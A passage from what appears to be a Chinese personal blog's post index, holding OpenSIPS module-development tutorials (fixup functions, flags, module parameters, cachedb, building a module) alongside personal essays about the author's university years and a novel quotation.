","permalink":"https://wdd.js.org/opensips/module-dev/l4-3/","summary":"假如一个模块暴露了一个函数,叫做do_something(), 仅支持传递一个参数。这个函数在c文件中对应w_do_something()\n// 在opensips.cfg文件中 route{ do_something(\u0026#34;abc\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是abc } // 在opensips.cfg文件中 route{ $var(num)=\u0026#34;abc\u0026#34;; do_something(\u0026#34;$var(num)\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是$var(num) // 这时候就有问题了,其实我们想获取的是$var(num)的值abc, 而不是字符串$var(num) } 那怎么获取$var()的传参的值呢?这里就需要用到了函数的fixup_函数。\nstatic cmd_export_t cmds[]={ {\u0026#34;find_zone_code\u0026#34;, (cmd_function)w_do_something, 2, fixup_do_something, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; // 调用fixup_spve, 只有在fixup函数中,对函数的参数执行了fixup, 在真正的执行函数中,才能得到真正的$var()的值 static int fixup_do_something(void** param, int param_no) { LM_INFO(\u0026#34;fixup_find_zone_code: param: %s param_no: %d\\n\u0026#34;, (char *)*param, param_no); return fixup_spve(param); } static int w_do_something (struct sip_msg* msg, char* str1){ str zone; if (fixup_get_svalue(msg, (gparam_p)str1, \u0026amp;zone) !","title":"ch4-3 $var() 类型的传参"},{"content":"2012年,我从安徽的一个小城市考到上海,前往一个普通的二本院校上大学,学习网络工程。\n在很多人以为,上大学不就是玩吗?其实也基本属实,特别是像我们这种普通的学校。但是我的大学也并没有荒废,这其实也并不是说明我就多优秀。 这其中的原因,说来也是蛮有意思。我打游戏太菜,而且心理素质不好,且又没有坚持不懈的毅力。所以我就早早的放弃了英雄联盟这种游戏。\n一个大学生,一旦放弃了打游戏,其实他就剩余了很多空余的时间。多余的时间能干生么呢?\n选择不多。1. 可以选择谈谈恋爱。但是一来我囊中羞涩,而来也没有什么长得比较漂亮,一见钟情的女生。所以谈恋爱这事就放下了。 剩下的选择便只有一个,学习。\n对了,就是学习。当其他人都选择游戏娱乐的时候,你稍微用点力,就能比很多人优秀。\n下一个问题就是学习。 学习要有兴趣,并且要决定学什么。\n这种时候,我思潮又落入回忆中,似乎忘记的事情,此刻又清晰想起来。\n那是我初三暑假的时候,参加过一次学校组织的计算机免费培训课程,其中培训了很多东西。像五笔打字、制作flash、学习photoshop之类的。上课老师在课堂上说过,培训结束的时候,会选择几个成绩优异的学生,给予几百块的奖励。为了这几百块的奖励,我也不能退缩,我很快记住了五笔词根。然后在课堂上,我在众同学佩服的眼光中,把五笔字根全部背了一遍给老师听。\n学习的内容中,photoshop真实给我打开了一个通往神秘世界的大门,原来电脑还能做这么牛逼的事情。接下来经过我废寝忘食,专心致志,一丝不苟的学习,我已经知道了一些基本的图片制作技巧。利用这个技巧,我做了很多搞笑的图片,just for fun!\n然而直到暑假结束,很多同学心心念念的几百块奖励,讲课老师在也没有提过。\n我想,有了初中的ps经验,况且我对这东西很感兴趣。所以我就从淘宝上换了几十块钱,买了一本很厚的,讲解photoshop的书。按照书中的指导,我对photoshop有了全面系统的学习,然后又跟着实战,学会了很多关于抠图、美容、特效的技术。虽然我学了photoshop,但是感觉上并没有什么用,因为考试又不考photoshop, 所以我只能自己通过制作一些搞笑图片来自娱自乐。\n然而,一旦你学会某个东西,便真的有派上用场的时候。大四快毕业时,很多同学开始搞简历,简历上一般要贴照片的。所以我便成为了班级里远近闻名的修图大师。\n除了photoshop,专业课上可以说的就是学习编程了。当时我c语言学的非常好,授课老师经常在课堂上提我来回答问题。为了避免回答不上来问题,显得很没面子。我经常在上课之前偷偷的就预习上课的内容,并且学习如何解答课后的习题。所以老师的提问我经常可以轻松的回答。老师似乎我觉得我是个可育之才,经常在其他班级上课的时候,也会在课上提我的名字,说:其他班的王xx同学,他这个问题回答的很好。所以一些其他班级的同学,也是知道我的名字的。\n每每到考试之前,我总会收到不少加我QQ好友的申请,然后问我有没有时间,想找我帮他们复习c语言。然后带上饮料,约我到图书馆,当面传道授业解惑。我还记得一个比较奇葩的老师,给同学布置作业,要求实现某某功能,至少要求要有三千行代码,然后该同学东拼西凑,也只凑够了快一千行,然后找我帮忙。\n可以参考:\n大二的暑假,我们搬了校区。从远离市区的新校区,搬到了离市区比较近的老校区。\n快放假了,有不少的同学决定暑假留校,然后找点工作,赚点零花钱。\n我也觉得放假回家没意思,决定暑假找工作。因为我有一些photoshop的基础,所以就在招聘网站上写自己精通photoshop,看看有没有人需要。很快我找到了一份工作,然而刚开始的工作并不是图片制作,而是摄影摄像。具体的内容是给古玩艺术品拍照,然后我就一边学习一边拍照,照片拍完还要用ps做后期处理。所以整个暑假,包括大三,和大四。我基本上都在和古玩艺术品打交道,见识了不少的宝贝。从书画,到紫砂壶,玉器,陶器,手工艺品等等,都有接触。上海的各大古玩城,我也基本都跑过好几遍。也组织过一次小型的拍卖会,主要负责拍卖图册的制作。\n我的大三和大四时很忙的,倒不是学习,而是课外的工作。工作很累,每晚基本上都是9点以后下班,回到学校就基本上10点左右。有时候因为太累而在地铁上睡着,结果坐过站了。正好是最后一班地铁,所以只能下了地铁,步行往回走。\n课外的工作很累,但也学到了不少的东西。除此之外,就是自己赚钱能养活自己了。至少大三和大四,我没有再问父母要过生活费。即使是对于父母,要生活费这件事情,也让我觉得不在自在。我是一个向往自由的人,不希望被任何人束缚,即使是父母。\n课外工作的最后阶段,我用自己赚的钱买了人生第一个非常贵的手机iphone6s。我觉得,这是我应得的东西。\n匆匆4年,大学就这么结束了。我对大学并没有什么怀念,只是觉得,我算是蛮幸运的,至少没有白白浪费掉四年的光阴。\n","permalink":"https://wdd.js.org/posts/2021/04/mcgyoz/","summary":"2012年,我从安徽的一个小城市考到上海,前往一个普通的二本院校上大学,学习网络工程。\n在很多人以为,上大学不就是玩吗?其实也基本属实,特别是像我们这种普通的学校。但是我的大学也并没有荒废,这其实也并不是说明我就多优秀。 这其中的原因,说来也是蛮有意思。我打游戏太菜,而且心理素质不好,且又没有坚持不懈的毅力。所以我就早早的放弃了英雄联盟这种游戏。\n一个大学生,一旦放弃了打游戏,其实他就剩余了很多空余的时间。多余的时间能干生么呢?\n选择不多。1. 可以选择谈谈恋爱。但是一来我囊中羞涩,而来也没有什么长得比较漂亮,一见钟情的女生。所以谈恋爱这事就放下了。 剩下的选择便只有一个,学习。\n对了,就是学习。当其他人都选择游戏娱乐的时候,你稍微用点力,就能比很多人优秀。\n下一个问题就是学习。 学习要有兴趣,并且要决定学什么。\n这种时候,我思潮又落入回忆中,似乎忘记的事情,此刻又清晰想起来。\n那是我初三暑假的时候,参加过一次学校组织的计算机免费培训课程,其中培训了很多东西。像五笔打字、制作flash、学习photoshop之类的。上课老师在课堂上说过,培训结束的时候,会选择几个成绩优异的学生,给予几百块的奖励。为了这几百块的奖励,我也不能退缩,我很快记住了五笔词根。然后在课堂上,我在众同学佩服的眼光中,把五笔字根全部背了一遍给老师听。\n学习的内容中,photoshop真实给我打开了一个通往神秘世界的大门,原来电脑还能做这么牛逼的事情。接下来经过我废寝忘食,专心致志,一丝不苟的学习,我已经知道了一些基本的图片制作技巧。利用这个技巧,我做了很多搞笑的图片,just for fun!\n然而直到暑假结束,很多同学心心念念的几百块奖励,讲课老师在也没有提过。\n我想,有了初中的ps经验,况且我对这东西很感兴趣。所以我就从淘宝上换了几十块钱,买了一本很厚的,讲解photoshop的书。按照书中的指导,我对photoshop有了全面系统的学习,然后又跟着实战,学会了很多关于抠图、美容、特效的技术。虽然我学了photoshop,但是感觉上并没有什么用,因为考试又不考photoshop, 所以我只能自己通过制作一些搞笑图片来自娱自乐。\n然而,一旦你学会某个东西,便真的有派上用场的时候。大四快毕业时,很多同学开始搞简历,简历上一般要贴照片的。所以我便成为了班级里远近闻名的修图大师。\n除了photoshop,专业课上可以说的就是学习编程了。当时我c语言学的非常好,授课老师经常在课堂上提我来回答问题。为了避免回答不上来问题,显得很没面子。我经常在上课之前偷偷的就预习上课的内容,并且学习如何解答课后的习题。所以老师的提问我经常可以轻松的回答。老师似乎我觉得我是个可育之才,经常在其他班级上课的时候,也会在课上提我的名字,说:其他班的王xx同学,他这个问题回答的很好。所以一些其他班级的同学,也是知道我的名字的。\n每每到考试之前,我总会收到不少加我QQ好友的申请,然后问我有没有时间,想找我帮他们复习c语言。然后带上饮料,约我到图书馆,当面传道授业解惑。我还记得一个比较奇葩的老师,给同学布置作业,要求实现某某功能,至少要求要有三千行代码,然后该同学东拼西凑,也只凑够了快一千行,然后找我帮忙。\n可以参考:\n大二的暑假,我们搬了校区。从远离市区的新校区,搬到了离市区比较近的老校区。\n快放假了,有不少的同学决定暑假留校,然后找点工作,赚点零花钱。\n我也觉得放假回家没意思,决定暑假找工作。因为我有一些photoshop的基础,所以就在招聘网站上写自己精通photoshop,看看有没有人需要。很快我找到了一份工作,然而刚开始的工作并不是图片制作,而是摄影摄像。具体的内容是给古玩艺术品拍照,然后我就一边学习一边拍照,照片拍完还要用ps做后期处理。所以整个暑假,包括大三,和大四。我基本上都在和古玩艺术品打交道,见识了不少的宝贝。从书画,到紫砂壶,玉器,陶器,手工艺品等等,都有接触。上海的各大古玩城,我也基本都跑过好几遍。也组织过一次小型的拍卖会,主要负责拍卖图册的制作。\n我的大三和大四时很忙的,倒不是学习,而是课外的工作。工作很累,每晚基本上都是9点以后下班,回到学校就基本上10点左右。有时候因为太累而在地铁上睡着,结果坐过站了。正好是最后一班地铁,所以只能下了地铁,步行往回走。\n课外的工作很累,但也学到了不少的东西。除此之外,就是自己赚钱能养活自己了。至少大三和大四,我没有再问父母要过生活费。即使是对于父母,要生活费这件事情,也让我觉得不在自在。我是一个向往自由的人,不希望被任何人束缚,即使是父母。\n课外工作的最后阶段,我用自己赚的钱买了人生第一个非常贵的手机iphone6s。我觉得,这是我应得的东西。\n匆匆4年,大学就这么结束了。我对大学并没有什么怀念,只是觉得,我算是蛮幸运的,至少没有白白浪费掉四年的光阴。","title":"我的传记 - 大学篇"},{"content":"flag的类型 enum flag_type { FLAG_TYPE_MSG=0, FLAG_TYPE_BRANCH, FLAG_LIST_COUNT, }; flag实际上是一种二进制的位 MAX_FLAG就是一个SIP消息最多可以有多少个flag\n#include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) 这个值更具情况而定,我的机器上是最多32个。\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) int main() { printf(\u0026#34;%zu\\n\u0026#34;, sizeof(unsigned int)); printf(\u0026#34;%u\\n\u0026#34;, CHAR_BIT); printf(\u0026#34;%u\\n\u0026#34;, MAX_FLAG); return 0; } $gcc -o main *.c $main 4 8 31 由字符串获取flag opensips 1.0时,flag都是整数,2.0才引入了字符串。\n用数字容易傻傻分不清楚,字符串比较容易理解。\nsetflag(3); setflag(4); setflag(5); setflag(IS_FROM_SBC); 首先,我们先要获取flag的字符串表示。这个可以用模块的参数传递进来。\nstatic param_export_t params[]={ {\u0026#34;use_test_flag\u0026#34;, STR_PARAM, \u0026amp;use_test_flag_str}, {0,0,0} }; 然后我们需要在mod_init或者fixup函数中获取字符串flag对应的flagId\nstatic int mod_init(void) { flag_use_high = get_flag_id_by_name(FLAG_TYPE_MSG, use_test_flag_str); LM_INFO(\u0026#34;flag mask: %d\\n\u0026#34;, flag_use_high); return 0; } 在消息处理中,用isflagset去判断flag是否存在。isflagset返回-1,就说明flag不存在。返回1就说明flag已经存在。\nstatic int w_find_zone_code(struct sip_msg* msg, char* str1,char* str2) { int is_set = isflagset(msg, flag_use_high); LM_INFO(\u0026#34;flag_use_high is %d\\n\u0026#34;, is_set); return 1; } ","permalink":"https://wdd.js.org/opensips/module-dev/l4-2/","summary":"flag的类型 enum flag_type { FLAG_TYPE_MSG=0, FLAG_TYPE_BRANCH, FLAG_LIST_COUNT, }; flag实际上是一种二进制的位 MAX_FLAG就是一个SIP消息最多可以有多少个flag\n#include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) 这个值更具情况而定,我的机器上是最多32个。\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;limits.h\u0026gt; typedef unsigned int flag_t; #define MAX_FLAG ((unsigned int)( sizeof(flag_t) * CHAR_BIT - 1 )) int main() { printf(\u0026#34;%zu\\n\u0026#34;, sizeof(unsigned int)); printf(\u0026#34;%u\\n\u0026#34;, CHAR_BIT); printf(\u0026#34;%u\\n\u0026#34;, MAX_FLAG); return 0; } $gcc -o main *.c $main 4 8 31 由字符串获取flag opensips 1.0时,flag都是整数,2.0才引入了字符串。\n用数字容易傻傻分不清楚,字符串比较容易理解。","title":"ch4-2 flag获取"},{"content":"最近看到澎湃新闻报道了一个博士论文的致谢部分,内容如下:\n走了很远的路,吃了很多的苦,才将这份博士学位论文送到你的面前。二十二载求学路,一路风雨泥泞,许多不容易。如梦一场,仿佛昨天一家人才团聚过。\n看到这个句子,我瞬间觉得一种似曾相识之感。\n我记得我也曾写过类似的句子。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华 才学会什么是效率,什么是专一。 蓦然回首 10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n生命不息 折腾不止 使用ubuntu作为主力开发工具\n其实,这种句子也不是我的原创。是我仿照我看过的一本小说,从中摘抄而来。\n这本小说叫做《项塔兰》\n我花了很长的岁月,走过大半个世界,才真正学到什么是爱、什么是命运,以及我们所做的抉择。我被拴在墙上遭受拷打时,才顿悟这个真谛。不知为何,就在我内心发出呐喊之际,我意识到,即使镣铐加身,一身血污,孤立无助,我仍然是自由之身,我可以决定是要痛恨拷打我的人,还是原谅他们。我知道,这听起来似乎算不了什么,但在镣铐加身、痛苦万分的当下,当镣铐是你唯一仅有的,那份自由将带给你无限的希望。是要痛恨,还是要原谅,这抉择足以决定人一生的际遇。《项塔兰》\n这是一名通缉犯的十年印度流亡岁月的记录,很难想象,一名在逃犯是如何写出如此优秀的文笔。各位看官有时间可以看看。\n参考 https://mp.weixin.qq.com/s/9kfGCXevO5Hlpg_iINof6Q ","permalink":"https://wdd.js.org/posts/2021/04/dttcg5/","summary":"最近看到澎湃新闻报道了一个博士论文的致谢部分,内容如下:\n走了很远的路,吃了很多的苦,才将这份博士学位论文送到你的面前。二十二载求学路,一路风雨泥泞,许多不容易。如梦一场,仿佛昨天一家人才团聚过。\n看到这个句子,我瞬间觉得一种似曾相识之感。\n我记得我也曾写过类似的句子。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华 才学会什么是效率,什么是专一。 蓦然回首 10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n生命不息 折腾不止 使用ubuntu作为主力开发工具\n其实,这种句子也不是我的原创。是我仿照我看过的一本小说,从中摘抄而来。\n这本小说叫做《项塔兰》\n我花了很长的岁月,走过大半个世界,才真正学到什么是爱、什么是命运,以及我们所做的抉择。我被拴在墙上遭受拷打时,才顿悟这个真谛。不知为何,就在我内心发出呐喊之际,我意识到,即使镣铐加身,一身血污,孤立无助,我仍然是自由之身,我可以决定是要痛恨拷打我的人,还是原谅他们。我知道,这听起来似乎算不了什么,但在镣铐加身、痛苦万分的当下,当镣铐是你唯一仅有的,那份自由将带给你无限的希望。是要痛恨,还是要原谅,这抉择足以决定人一生的际遇。《项塔兰》\n这是一名通缉犯的十年印度流亡岁月的记录,很难想象,一名在逃犯是如何写出如此优秀的文笔。各位看官有时间可以看看。\n参考 https://mp.weixin.qq.com/s/9kfGCXevO5Hlpg_iINof6Q ","title":"关于中科院回信文字的联想"},{"content":"底层可用 local 缓存存在本地,速度快,但是多实例无法共享,重启后消失 redis 缓存存在redis, 多实例可以共享,重启后不消失 接口 store -cache_store() 存储 fetch -cache_fetch() 获取 remove -cache_remove() 删除 add -cache_add() 递增 sub -cache_sub() 递减 cache_counter_fetch 获取某个key的值 关于过期的单位 虽然文档上没有明说,但是过期的单位都是秒。\ncachedb_local过期 loadmodule \u0026#34;cachedb_local.so\u0026#34; modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cachedb_url\u0026#34;, \u0026#34;local://\u0026#34;) modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cache_clean_period\u0026#34;, 600) route[xxx]{ cache_add(\u0026#34;local\u0026#34;, \u0026#34;$fu\u0026#34;, 100, 5); } 假如说:在5秒之内,同一个$fu来了多个请求,在设置这个$fu值的时候,计时器是不会重置的。过期的计时器还是第一次的设置的那个时间点开始计时。\n参考 https://www.opensips.org/Documentation/Tutorials-KeyValueInterface ","permalink":"https://wdd.js.org/opensips/ch6/cachedb/","summary":"底层可用 local 缓存存在本地,速度快,但是多实例无法共享,重启后消失 redis 缓存存在redis, 多实例可以共享,重启后不消失 接口 store -cache_store() 存储 fetch -cache_fetch() 获取 remove -cache_remove() 删除 add -cache_add() 递增 sub -cache_sub() 递减 cache_counter_fetch 获取某个key的值 关于过期的单位 虽然文档上没有明说,但是过期的单位都是秒。\ncachedb_local过期 loadmodule \u0026#34;cachedb_local.so\u0026#34; modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cachedb_url\u0026#34;, \u0026#34;local://\u0026#34;) modparam(\u0026#34;cachedb_local\u0026#34;, \u0026#34;cache_clean_period\u0026#34;, 600) route[xxx]{ cache_add(\u0026#34;local\u0026#34;, \u0026#34;$fu\u0026#34;, 100, 5); } 假如说:在5秒之内,同一个$fu来了多个请求,在设置这个$fu值的时候,计时器是不会重置的。过期的计时器还是第一次的设置的那个时间点开始计时。\n参考 https://www.opensips.org/Documentation/Tutorials-KeyValueInterface ","title":"cachedb的相关问题"},{"content":"模块传参有两种类型\n直接赋值传参 间接函数调用传参 str local_zone_code = {\u0026#34;\u0026#34;,0}; int some_int_param = 0; static param_export_t params[]={ // 直接字符串赋值 {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, // 直接整数赋值 {\u0026#34;some_int_param\u0026#34;, INT_PARAM, \u0026amp;some_int_param}, // 函数调用 字符窜 {\u0026#34;zone_code_map\u0026#34;, STR_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map}, // 函数调用 整数 {\u0026#34;zone_code_map_int\u0026#34;, INT_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map_int}, {0,0,0} }; 使用函数处理参数的好处是,可以对参数做更复杂的处理。\n例如:\n某个参数可以多次传递 对参数进行校验,在启动前就可以判断传参是否有问题。 static int set_code_zone_map(unsigned int type, void *val) { LM_INFO(\u0026#34;set_zone_code_map type:%d val:%s \\n\u0026#34;,type,(char *)val); return 1; } ","permalink":"https://wdd.js.org/opensips/module-dev/l4-1/","summary":"模块传参有两种类型\n直接赋值传参 间接函数调用传参 str local_zone_code = {\u0026#34;\u0026#34;,0}; int some_int_param = 0; static param_export_t params[]={ // 直接字符串赋值 {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, // 直接整数赋值 {\u0026#34;some_int_param\u0026#34;, INT_PARAM, \u0026amp;some_int_param}, // 函数调用 字符窜 {\u0026#34;zone_code_map\u0026#34;, STR_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map}, // 函数调用 整数 {\u0026#34;zone_code_map_int\u0026#34;, INT_PARAM|USE_FUNC_PARAM, (void *)\u0026amp;set_code_zone_map_int}, {0,0,0} }; 使用函数处理参数的好处是,可以对参数做更复杂的处理。\n例如:\n某个参数可以多次传递 对参数进行校验,在启动前就可以判断传参是否有问题。 static int set_code_zone_map(unsigned int type, void *val) { LM_INFO(\u0026#34;set_zone_code_map type:%d val:%s \\n\u0026#34;,type,(char *)val); return 1; } ","title":"ch4-1 USE_FUNC_PARAM参数类型"},{"content":"本章节,带领大家探索opensips模块开发。希望深入了解opensips的同学可以看看。\n内容涵盖 章节的内容将会涵盖\nopensips的启动流程 如何创建一个模块 如何给模块传递参数 模块的生命周期函数的处理 如何暴露自定义的函数 如何检查函数的传惨 如何获取$var或者$avp变量 如何获取相关的flag 如何修改SIP消息 如何编写mi接口 如何编写statistics统计数据 如何做数据库操作 OpenSIPS架构 参考 https://voipmagazine.files.wordpress.com/2014/09/opensips-arch.jpg ","permalink":"https://wdd.js.org/opensips/module-dev/l1/","summary":"本章节,带领大家探索opensips模块开发。希望深入了解opensips的同学可以看看。\n内容涵盖 章节的内容将会涵盖\nopensips的启动流程 如何创建一个模块 如何给模块传递参数 模块的生命周期函数的处理 如何暴露自定义的函数 如何检查函数的传惨 如何获取$var或者$avp变量 如何获取相关的flag 如何修改SIP消息 如何编写mi接口 如何编写statistics统计数据 如何做数据库操作 OpenSIPS架构 参考 https://voipmagazine.files.wordpress.com/2014/09/opensips-arch.jpg ","title":"ch1 开发课程简介"},{"content":"开始 我们需要给home_location模块增加一个参数,配置当地的号码区号\n首先,我们删除maxfwd.c文件中开头的很多注释,我们先把注意力集中在代码上。\n删除了30多行注释,代码还剩160多行。\n首先我们一个变量,用来保存本地的区号。这个变量是个str类型。\nstr local_zone_code = {\u0026#34;\u0026#34;,0}; str 关于str类型,可以参考opensips/str.h头文件。\nstruct __str { char* s; /**\u0026lt; string as char array */ int len; /**\u0026lt; string length, not including null-termination */ }; typedef struct __str str; 实际上,str是个指向__str结构体,可以看出这个结构体有指向字符串的char*类型的指针,以及一个代表字符串长度的len属性。这样做的好处是可以高效的获取字符串的长度,很多有名的开源项目都有类似的结构体。\nopensips几乎所有的字符串都是用的str类型\nparam_export_t param_export_t这个结构体是用来通过脚本里面的modparam向模块传递参数的。这个数组最后一向是{0,0,0} 这最后一项其实是个标志,标志着数组的结束。\nstatic param_export_t params[]={ {\u0026#34;max_limit\u0026#34;, INT_PARAM, \u0026amp;max_limit}, {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, {0,0,0} }; 在sr_module_deps.h和sr_module.h中有下面的代码\ntypedef struct param_export_ param_export_t; param_export_t实际上是指向param_export_这个结构体。\n这个结构体有三个参数\nname 表示参数的名称 modparam_t 表示参数的类型。参数类型有以下几种 STR_PARAM 字符串类型 INT_PARAM 整数类型 USE_FUNC_PARAM 函数类型 PARAM_TYPE_MASK 这个用到的时候再说 param_pointer 是一个指针,用到的时候再具体说明 struct param_export_ { char* name; /*!\u0026lt; null terminated param. name */ modparam_t type; /*!\u0026lt; param. type */ void* param_pointer; /*!\u0026lt; pointer to the param. memory location */ }; #define STR_PARAM (1U\u0026lt;\u0026lt;0) /* String parameter type */ #define INT_PARAM (1U\u0026lt;\u0026lt;1) /* Integer parameter type */ #define USE_FUNC_PARAM (1U\u0026lt;\u0026lt;(8*sizeof(int)-1)) #define PARAM_TYPE_MASK(_x) ((_x)\u0026amp;(~USE_FUNC_PARAM)) typedef unsigned int modparam_t; 回过头来,看看local_zone_code这个参数的配置,是不是就非常明确了呀\n{\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, 接着,你可能会问,加入我们配置好了这个参数,如何再运行的时候将local_zone_code这个变量的值打印出来呢?\n再module_exports这个结构体里面,最后的几个参数实际上是一个函数。\n这些函数再模块的生命周期内会调用。比如那个mod_init, 就是模块初始化的时候就会调用这个函数。\n那么,我们就在模块初始化的时候打印local_zone_code的值好了。\n下面的代码,我们其实只插入了一行, LM_INFO, 用来打印。其他就保持原样好了。\nmod_init函数的返回值是有特殊含义的,如果返回是0,表示成功。如果返回的是负数, 例如E_CFG, 这时候opensips就会认为你的脚本写的有问题,就不会继续启动opensips。\nstatic int mod_init(void) { LM_INFO(\u0026#34;initializing...\\n\u0026#34;); LM_INFO(\u0026#34;Initializing local_zone_code: %s\\n\u0026#34;, local_zone_code.s); if ( max_limit\u0026lt;1 || max_limit\u0026gt;MAXFWD_UPPER_LIMIT ) { LM_ERR(\u0026#34;invalid max limit (%d) [1,%d]\\n\u0026#34;, max_limit,MAXFWD_UPPER_LIMIT); return E_CFG; } return 0; } 再error.h中,可以看到opensips定义了很多的错误码。\n编译模块 源码的c文件我们修改好了,下面就是编译它,不知道会不会报错呢?😂\n➜ home_location git:(home_location) ✗ ./dev.sh build /root/code/gitee/opensips make[1]: Entering directory \u0026#39;/root/code/gitee/opensips/modules/home_location\u0026#39; Compiling maxfwd.c Linking home_location.so make[1]: Leaving directory \u0026#39;/root/code/gitee/opensips/modules/home_location\u0026#39; 似乎没啥问题\n编辑dev.cfg 增加local_zone_code参数 loadmodule \u0026#34;/root/code/gitee/opensips/modules/home_location/home_location.so\u0026#34; + modparam(\u0026#34;home_location\u0026#34;, \u0026#34;local_zone_code\u0026#34;, \u0026#34;010\u0026#34;) ./dev.sh start 看看log.txt, local_zone_code已经被打印出来,并且他的值是我们在cfg脚本里配置的010。\n~ Apr 21 13:47:40 [1048372] INFO:home_location:mod_init: initializing... ~ Apr 21 13:47:40 [1048372] INFO:home_location:mod_init: Initializing local_zone_code: 010 ok, 第三章结束。\n","permalink":"https://wdd.js.org/opensips/module-dev/l4/","summary":"开始 我们需要给home_location模块增加一个参数,配置当地的号码区号\n首先,我们删除maxfwd.c文件中开头的很多注释,我们先把注意力集中在代码上。\n删除了30多行注释,代码还剩160多行。\n首先我们一个变量,用来保存本地的区号。这个变量是个str类型。\nstr local_zone_code = {\u0026#34;\u0026#34;,0}; str 关于str类型,可以参考opensips/str.h头文件。\nstruct __str { char* s; /**\u0026lt; string as char array */ int len; /**\u0026lt; string length, not including null-termination */ }; typedef struct __str str; 实际上,str是个指向__str结构体,可以看出这个结构体有指向字符串的char*类型的指针,以及一个代表字符串长度的len属性。这样做的好处是可以高效的获取字符串的长度,很多有名的开源项目都有类似的结构体。\nopensips几乎所有的字符串都是用的str类型\nparam_export_t param_export_t这个结构体是用来通过脚本里面的modparam向模块传递参数的。这个数组最后一向是{0,0,0} 这最后一项其实是个标志,标志着数组的结束。\nstatic param_export_t params[]={ {\u0026#34;max_limit\u0026#34;, INT_PARAM, \u0026amp;max_limit}, {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, {0,0,0} }; 在sr_module_deps.h和sr_module.h中有下面的代码\ntypedef struct param_export_ param_export_t; param_export_t实际上是指向param_export_这个结构体。\n这个结构体有三个参数\nname 表示参数的名称 modparam_t 表示参数的类型。参数类型有以下几种 STR_PARAM 字符串类型 INT_PARAM 整数类型 USE_FUNC_PARAM 函数类型 PARAM_TYPE_MASK 这个用到的时候再说 param_pointer 是一个指针,用到的时候再具体说明 struct param_export_ { char* name; /*!","title":"ch4 配置模块的启动参数"},{"content":"从头写一个模块是比较麻烦的,我们可以基于一个简单的模块,然后在这个模块上进行一些修改。\n我们基于maxfwd这个模块,复制一个模块,叫做home_location。\n为什么叫做home_location呢?因为我想根据一个手机号,查出它的归属地,然后根据当地的归属地,判断号码前要不要加0\ncd modules cp -R maxfwd home_location ➜ home_location git:(home_location) ✗ ll total 300K drwxr-xr-x 2 root root 4.0K Apr 20 13:56 doc -rw-r--r-- 1 root root 217 Apr 20 14:00 Makefile -rw-r--r-- 1 root root 4.7K Apr 20 14:00 maxfwd.c -rw-r--r-- 1 root root 2.0K Apr 20 13:56 maxfwd.d -rw-r--r-- 1 root root 77K Apr 20 13:56 maxfwd.o -rwxr-xr-x 1 root root 93K Apr 20 13:56 maxfwd.so -rw-r--r-- 1 root root 4.0K Apr 20 13:56 mf_funcs.c -rw-r--r-- 1 root root 2.1K Apr 20 13:56 mf_funcs.d -rw-r--r-- 1 root root 1.2K Apr 20 13:56 mf_funcs.h -rw-r--r-- 1 root root 84K Apr 20 13:56 mf_funcs.o -rw-r--r-- 1 root root 7.0K Apr 20 13:56 README 下面的操作都是操作home_location目录下的文件。\n修改Makefile NAME改为home_location.so\nNAME=home_location.so 修改maxfwd.c module_exports的结构体的第一个参数,改为home_location 编译home_location模块 上面的操作,其实只是给maxfwd模块改了个名字,没有修改任何具体代码。\n我们在home_location目录下创建一个dev.sh脚本文件,用来做一些快速起停,或者编译模块的事项\ndev.sh #!/bin/bash case $1 in build) cd ../../ pwd; make modules modules=modules/home_location ;; start) killall opensips ulimit -t unlimited sleep 1 /usr/local/sbin/opensips -f ./dev.cfg -w . \u0026amp;\u0026gt; log.txt \u0026amp; echo $? ;; stop) killall opensips echo stop ;; *) echo bad;; esac chmod +x dev.sh # 用来编译home_location模块 ./dev.sh build # 用来启动opensips, 启动opensips之后,输出的日志会写到log.txt文件中, ./dev.sh start # 用来停止opensips ./dev.sh stop dev.cfg 启动opensips需要一个cfg脚本文件,我们自己做一个简单的\n脚本有以下的注意点:\nloadmodule加载home_location.so我使用了绝对路径,如果在你自己的机器上,目录可能需要修改 log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 debug_mode=no memdump=1 auto_aliases=no listen=udp:0.0.0.0:17634 listen=tcp:0.0.0.0:17634 mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;proto_tcp.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) loadmodule \u0026#34;/root/code/gitee/opensips/modules/home_location/home_location.so\u0026#34; startup_route{ xlog(\u0026#34;opensips startup\u0026#34;); } route{ 